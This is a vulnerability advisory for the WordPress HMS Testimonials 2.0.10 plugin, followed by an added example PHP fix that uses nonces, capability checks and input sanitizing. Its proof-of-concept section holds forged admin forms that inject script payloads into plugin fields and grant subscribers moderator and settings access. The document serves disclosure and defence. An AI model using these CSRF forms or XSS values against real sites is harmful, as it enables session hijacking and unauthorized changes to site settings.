
WordPress HMS Testimonials 2.0.10 XSS / CSRF Vulnerability

Published: 2013-08-09
Updated: 2013-08-10

Affected systems:
WordPress HMS Testimonials 2.0.10

Description:
--------------------------------------------------------------------------------
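The WordPress HMS Testimonials plugin displays customer testimonials on pages or posts. All forms in WordPress HMS Testimonials are affected by a CSRF vulnerability, which can allow a remote attacker to perform unauthorized database operations.

<*Source: Jeff Kreitner

  Link: http://packetstormsecurity.com/files/122761/WordPress-HMS-Testimonials-2.0.10-XSS-CSRF.html
*>

Test method:
--------------------------------------------------------------------------------
Warning: The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Proof of Concept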
========================
1. Testimonial
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew">
    <input type="hidden" name="name" value="<script>alert("xss")</script>">
    <input type="hidden" name="image" value="<script>alert("xss")</script>">
    <input type="hidden" name="testimonial_date" value="08/08/2013">
    <input type="hidden" name="url" value="<script>alert(String.fromCharCode(88,83,83))</script>">
    <input type="hidden" name="testimonial" value="<script>alert("xss")</script>">
    <input type="hidden" name="display" value="1">
    <input type="submit" name="save" value="Save Testimonial">
</form>

2. Group
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true">
    <input type="hidden" name="name" value="New group">
    <input type="submit" name="save" value="Save Group">
</form>

3.1. Settings - Default
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings">
    <input type="hidden" name="active_links_nofollow" value="1">
    <input type="hidden" name="image_width" value="100">
    <input type="hidden" name="image_height" value="100">
    <input type="hidden" name="date_format" value="m/d/Y"><script>alert(3)</script>">
    <input type="hidden" name="testimonial_container" value="div">
    <input type="hidden" name="recaptcha_publickey" value="">
    <input type="hidden" name="recaptcha_privatekey" value="">
    <input type="submit" name="save" value="Save Settings (Default)">
</form>

3.2. Settings - Advanced
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced">
    <input type="hidden" name="moderator" value="subscriber">
    <input type="hidden" name="roles" value="subscriber">
    <input type="hidden" name="num_users_can_create" value="9999">
    <input type="hidden" name="autoapprove" value="subscriber">
    <input type="hidden" name="moderators_can_access_settings" value="1">
    <input type="hidden" name="js_load" value="1">
    <input type="hidden" name="roleorder[]" value="editor">
    <input type="hidden" name="roleorder[]" value="author">
    <input type="hidden" name="roleorder[]" value="contributor">
    <input type="hidden" name="roleorder[]" value="subscriber">
    <input type="submit" name="save" value="Save Settings (Advanced)">
</form>

3.3. Settings - Custom Fields
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields">
    <input type="hidden" name="name" value="xss">
    <input type="hidden" name="type" value="textarea">
    <input type="hidden" name="showonform" value="1">
    <input type="submit" name="save" value="Save Settings (Custom Fields)">
</form>

3.4. Settings - Template
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new">
    <input type="hidden" name="name" value="New template<script>alert("xss")</script>">
    <input type="hidden" name="item[]" value="system_id">
    <input type="submit" name="save" value="Settings Templates (Save)">
</form>

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

WordPress
---------
The vendor has released an update that fixes this security issue. Download it from the vendor's page:

http://wordpress.org/plugins/hms-testimonials/
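
The class of fix this advisory calls for, shown as an added example (not the plugin's own code and not the vendor's patch): a WordPress admin form handler that rejects forged POSTs with a nonce and a capability check, sanitizes input before storing it, and escapes it on output. The hms_example_* names, the page slug, the nonce action and the option key are hypothetical.

```php
<?php
// Added example: hypothetical handler, not HMS Testimonials source code.
// Every hms_example_* name, the page slug, the nonce action and the option
// key are assumptions made for illustration.

const HMS_EXAMPLE_PAGE         = 'hms-example-group';
const HMS_EXAMPLE_NONCE_ACTION = 'hms_example_save_group';

// Render the form with a per-user, per-action nonce in a hidden field.
function hms_example_render_group_form() {
    $name   = get_option( 'hms_example_group_name', '' );
    $action = admin_url( 'admin.php?page=' . HMS_EXAMPLE_PAGE );
    // esc_attr() keeps a stored value containing quotes or markup inside
    // the value attribute instead of letting it close the tag.
    ?>
    <form method="post" action="<?php echo esc_url( $action ); ?>">
        <?php wp_nonce_field( HMS_EXAMPLE_NONCE_ACTION, 'hms_example_nonce' ); ?>
        <input type="text" name="name" value="<?php echo esc_attr( $name ); ?>">
        <input type="submit" name="save" value="Save Group">
    </form>
    <?php
}

// Handle the POST: authorize, verify the nonce, then sanitize before storing.
function hms_example_handle_group_save() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD']
        || ( $_GET['page'] ?? '' ) !== HMS_EXAMPLE_PAGE
        || ! isset( $_POST['save'] ) ) {
        return;
    }
    // A logged-in session alone is not enough: require the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request if the nonce is missing or invalid, which is the
    // case for a form auto-submitted from another site.
    check_admin_referer( HMS_EXAMPLE_NONCE_ACTION, 'hms_example_nonce' );

    // wp_unslash() undoes WordPress's added slashes; sanitize_text_field()
    // strips tags and control characters before the value is stored.
    $name = sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) );
    update_option( 'hms_example_group_name', $name );
}
add_action( 'admin_init', 'hms_example_handle_group_save' );
```

The nonce check addresses the CSRF half of the report, while the sanitize-on-input and escape-on-output pair addresses the script values the forms above submit.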